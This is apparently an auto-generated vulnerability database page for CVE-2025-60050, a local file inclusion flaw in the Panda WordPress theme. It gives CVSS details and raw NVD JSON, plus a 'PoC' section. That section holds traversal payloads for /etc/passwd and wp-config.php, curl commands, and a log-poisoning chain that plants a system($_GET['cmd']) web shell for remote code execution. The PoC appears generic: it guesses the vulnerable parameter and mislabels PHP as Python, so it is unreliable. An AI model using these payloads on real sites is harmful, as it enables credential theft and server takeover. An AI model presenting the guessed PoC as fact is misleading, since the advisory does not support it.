Security Vulnerability Report
中文
CVE-2025-60050 CVSS 8.1 HIGH

CVE-2025-60050

Published: 2025-12-18 08:16:05
Last Modified: 2026-04-27 16:16:30

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Panda panda allows PHP Local File Inclusion.This issue affects Panda: from n/a through <= 1.21.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:axiomthemes:panda:*:*:*:*:*:wordpress:*:* - VULNERABLE
Panda Theme <= 1.21

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php /** * CVE-2025-60050 PoC - Panda Theme Local File Inclusion * Affected: axiomthemes Panda WordPress Theme <= 1.21 * Note: This PoC is for educational and security research purposes only */ // Target URL configuration $target_url = 'http://target-site.com/wp-content/themes/panda/'; // PoC 1: Read local sensitive files $lfi_payloads = [ '../../../../etc/passwd', '../../../wp-config.php', '../../../../var/www/html/wp-config.php' ]; echo "[*] CVE-2025-60050 Local File Inclusion PoC\n"; echo "[*] Target: " . $target_url . "\n\n"; foreach ($lfi_payloads as $payload) { echo "[*] Testing: " . $payload . "\n"; // In real attack, send request with parameter like: // $url = $target_url . '?file=' . urlencode($payload); // file_get_contents($url); } // PoC 2: Log poisoning for RCE (if applicable) // 1. Inject PHP code to access log: <?php phpinfo(); ?> // 2. Include the log file: ?file=../../../../../apache/logs/access.log // Example attack URL: // http://target-site.com/wp-content/themes/panda/?file=../../../../etc/passwd%00 ?> <!-- Alternative curl-based PoC --> <!-- Read /etc/passwd --> <!-- curl 'http://target.com/wp-content/themes/panda/?file=../../../../etc/passwd' --> <!-- Read wp-config.php --> <!-- curl 'http://target.com/wp-content/themes/panda/?file=../../../wp-config.php' --> <!-- Log poisoning for RCE --> <!-- 1. Inject: curl 'http://target.com' -A "<?php system(\$_GET['cmd']); ?>" --> <!-- 2. Execute: curl 'http://target.com/wp-content/themes/panda/?file=/var/log/apache2/access.log&cmd=id' -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60050", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:16:04.613", "lastModified": "2026-04-27T16:16:30.283", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Panda panda allows PHP Local File Inclusion.This issue affects Panda: from n/a through <= 1.21."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:axiomthemes:panda:*:*:*:*:*:wordpress:*:*", "versionEndIncluding": "1.21", "matchCriteriaId": "29CB7044-C969-41F9-A205-713A0B8F99BA"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/panda/vulnerability/wordpress-panda-theme-1-21-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}